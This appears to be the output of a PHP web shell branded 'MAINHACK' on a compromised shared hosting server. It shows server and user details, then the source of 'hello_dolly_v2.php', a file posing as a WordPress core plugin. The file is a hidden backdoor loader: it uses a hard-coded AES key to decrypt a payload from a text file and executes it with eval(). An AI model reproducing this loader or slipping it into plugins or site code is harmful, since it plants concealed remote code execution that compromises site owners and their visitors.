Uname: Linux webm001.cluster110.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.3.33 [ PHP INFO ] PHP os: Linux
Server Ip: 213.186.33.19
Your Ip: 216.73.216.124
User: creationoo (224166) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl

name : hello_dolly_v2.php
<?php
/**
 * @package Hello Dolly V2
 * @version 1.0.1
 */
/*
Plugin Name: Hello Dolly V2
Plugin URI: https://wordpress.org/plugins/
Description: This is core plugin for managment WordPress.
Version: 1.0.1
Author URI: https://wordpress.org/
*/
error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
class UnsafeCrypto
{
 const METHOD = 'aes-256-ctr';
 public static function decrypt($message, $nonce, $key, $encoded = false)
 {
  if ($encoded) {
   $message = base64_decode($message, true);
   $nonce = base64_decode($nonce, true);
   if ($message === false || $nonce === false) {
        throw new Exception('Encryption failure');
   }

  }

  $plaintext = openssl_decrypt(
   $message,
   self::METHOD,
   $key,
   OPENSSL_RAW_DATA,
   $nonce
  );
            
  return $plaintext;
 }
}

$key = hex2bin('6b692d2e05bd85d5538e86d8dfc99901688006943a0e1e985f3106ff1311d30e');
$parts = file('./ytrgmjrvxw.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$decrypted = UnsafeCrypto::decrypt($parts[1], $parts[0], $key, true);
eval($decrypted);
?>
© 2026 MAINHACK